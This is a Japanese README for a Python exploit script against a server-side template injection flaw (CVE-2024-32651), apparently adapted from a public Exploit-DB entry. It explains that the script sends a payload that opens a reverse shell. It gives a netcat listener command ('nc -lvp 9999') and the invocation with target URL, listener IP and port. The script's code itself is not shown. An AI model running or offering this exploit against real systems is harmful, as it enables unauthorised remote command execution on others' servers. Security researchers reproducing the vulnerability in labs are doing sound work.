
サーバーサイドテンプレートインジェクションのエクスプロイト
サーバーサイドテンプレートインジェクション (SSTI) エクスプロイト!!
脆弱なWebアプリケーションにおけるサーバーサイドテンプレートインジェクション (SSTI) を介したリモートコード実行
このエクスプロイトは、サーバーサイドテンプレートインジェクション (SSTI) に対して脆弱なWebアプリケーションを標的にします。この脆弱性を悪用することで、攻撃者はサーバー上で任意のコマンドを実行できます。提供されるPythonスクリプトは、リバースシェルをトリガーするペイロードを送信することにより、エクスプロイトプロセスを自動化します。
脆弱性を再現するには、提供されたPythonスクリプトを脆弱なWebアプリケーションに対して実行してください。リバースシェル接続をキャプチャするために、リスナー (例: nc -lvp 9999) を実行しておいてください。
スクリプトを保存 ファイル名 CVE-2024-32651.py で保存します。
必要なPythonライブラリをインストール まだインストールされていない場合:
pip install requests beautifulsoup4
スクリプトを使用するには、以下のコマンドライン引数を指定します:
--url: 脆弱なWebアプリケーションのベースURL (例: http://10.10.10.10:5000)。--port: リスナー用のポート (例: 9999)。--ip: リスナーのIPアドレス (例: 10.10.50.22)。--notification: (任意) 通知URL 特定の通知URLを使用したい場合。python3 CVE-2024-32651.py --url http://<TARGET_URL> --port <LISTENER_PORT> --ip <LISTENER_IP> [--notification <NOTIFICATION_URL>]
この修正版エクスプロイトは、Zach Crosman (zcrosman) 氏が公開したオリジナルエクスプロイト (EDB-ID: 52027) に基づいています。オリジナルのエクスプロイトは こちら でご覧いただけます。セキュリティコミュニティへの貢献に感謝します。